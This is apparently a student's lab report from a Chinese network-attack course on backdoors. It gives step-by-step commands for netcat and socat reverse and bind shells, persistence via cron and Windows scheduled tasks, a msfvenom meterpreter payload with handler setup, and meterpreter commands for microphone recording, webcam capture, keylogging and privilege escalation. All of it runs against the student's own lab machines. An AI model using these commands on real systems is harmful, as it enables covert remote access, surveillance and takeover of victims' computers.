2019-2020-2 20174325叶竞蔚 《网络对抗技术》Exp2 后门原理与实践

实验内容

<i> 使用netcat获取主机操作Shell,cron启动

<ii> 使用socat获取主机操作Shell, 任务计划启动 

<iii> 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

<iv> 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

 

基础知识

<i> 例举你能想到的一个后门进入到你系统中的可能方式?

在第三方网站上下载软件或安装包时,包中含有后门程序,当我们下载到自己主机时,黑客便可以通过其后门程序进入到我们的系统里。

<ii> 例举你知道的后门如何启动起来(win及linux)的方式?

win中在我们创建新任务时设置的工作站锁定时定时启动后门程序

linux我们则是选择了cron启动定时任务,自定义时间启动。

<iii> Meterpreter有哪些给你映像深刻的功能?

对于我们音频和视频的提取,意味着如果后台程序一但进入了我们的系统,则我们在计算机面前的一切行为将都被得到监控什么保留,也意味着将被恶意使用。

<iv> 如何发现自己有系统有没有被安装后门?

定时使用杀毒防护软件对系统进行检测与维护,检查端口的状态,查看是否有陌生且异常的端口。

 

实验步骤

前期准备

<i> 下载老师提前给我们的附件nc或ncat。

nc:NC是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。

<ii> 在前面几次尝试中,由于对于mac系统操作的不确定性太多,故此次在最终实验之前安装了win10的虚拟机。

任务一使用netcat获取主机操作Shell,cron启动

1.Win获取Linux Shell

<i> 在win主机中打开命令行,且目录找到ncat所在地址

<ii> 查看主机ip地址 

 <iii> 进入nc所在的文件夹,输入nc.exe -l -p 4325,等待kali反弹连接。

<iv> 在linux终端输入nc 172.16.40.153 4325 -e /bin/sh

<v> 刚刚的win下则获得了一个linux shell,运行指令ls

 

2.Linux获得Win Shell

<i>linux输入ip add查看其IP地址

<ii> 输入nc -l -p 4325使其处于监听状态

<iii> 输入nc.exe -e cmd.exe 172.16.40.152 4325使win反弹连接linux

<iv> linux反馈以下win的命令提示

3.使用nc传输数据

<i>win输入nc.exe -l -p 4325运行监听指令

<ii> linux输入nc 172.16.40.153 4325连接到win

<iii> 传输数据。我这里是编写的Hello Yezi 174325

4.netcat获取主机操作,cron启动

<i>在主机打开命令行,输入nc.exe -l -p 4325开始监听4325端口

<ii> linux终端使用crontab -e命令编辑定时任务,选择basic编辑器

<iii> 按i以开启编辑状态并在最后一排插入13 * * * * /bin/netcat 172.16.40.153 4325 -e /bin/sh,即在每个小时的第13分钟反向连接主机4325端口。

<iv> 在系统第13分时输入ls,pwd命令检验

 已经反向连接至linux获取shell。

任务二使用socat获取主机操作Shell, 任务计划启动

<i>在主机中用右键点开左下角windows,选择计算机管理,进入任务计划程序,点击创建任务

 <ii> 常规中创建任务名称174325socat

 <iii> 触发器选择新建触发器:开始任务=>工作站锁定时,面对所有用户

 <iv> 在操作中选择新建操作,程序或脚本则添加socat.exe的路径,在添加参数中填写tcp-listen:4325 exec:cmd.exe,pty,stderr表示将cmd.exe绑定到4325端口,且同时将cmd.exestderr重定向至stdout

 <v> 在任务设置完成后锁定主机,任务开始运行

 <vi> linux输入socat - tcp:172.16.40.153:4325

 已经成功获得一个cmd shell

 任务三使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

<i>获取linux ip地址

 <ii> 在linux中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.200 LPORT=4325 -f exe > 20174325_backdoor.exe生成后门程序

 <iii>将后门程序复制进主机ncat文件夹

 <iv> linux中输入msfconsole进入msf控制台

<v> 输入use exploit/multi/handler使用监听模块、设置payload

<vi> 输入set payload windows/meterpreter/reverse_tcp使用与生成后门程序时相同的payload

<vii> 输入set LHOST 192.168.31.200

<viii> 输入set LPORT 4325

<ix> 输入exploit完成设置开始监听

 <x> 在主机上运行后门程序

 linux获得了主机的shell

任务四使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

<i> (接着上面的)在linux输入record_mic截取音频

 <ii> 输入webcam_snap截取摄像头内容

<iii> 输入keyscan_start记录击键记录

<iv>输入keyscan_dump读取击键记录

 <v> 输入getuid查看当前用户信息

<vi> 输入getsystem提权

实验总结与体会

此次实验做的过程较为艰难,因为包括看老师的指导视频还有网络上各种博主写过的有关博客基本都是涉及用win,而且在自己用os系统做的过程中几次连接不上,于是决定安装win虚拟机。在实验一开始一切都还算顺利,遇见的第一个难题就是定时任务那里,时间到了但输入指令却一直没有反应,后来换了系统之后那一块儿直接很顺利的就进行下去了。在整个实验中最难的一个地方就是实验三的过程,其中用nc从kali向主机传后门程序一直显示的是无效、无效、无效到最后也没能解决,于是采取的复制粘贴方式将后门程序复制进主机的ncat文件夹里,而紧接着在启动后门程序这里则是遇见了更莫名其妙的事情

 不知道是系统兼容的问题还是后门程序本身的问题,但我有按着指导的步骤一次又一次的尝试,这个地方比较让人崩溃因为我尝试了大概不下20次一个下午加一个晚上,终于在凌晨一点过最后一次尝试成功连接,所以可以看到我这里面有很多后门程序,因为我一直在不断重复任务三,尝试各种可能性。最后这个实验做完的时候不仅是舒了口气更是觉得心理抗压能力日益见长。

原文地址:https://www.cnblogs.com/lovelonglive7/p/12522241.html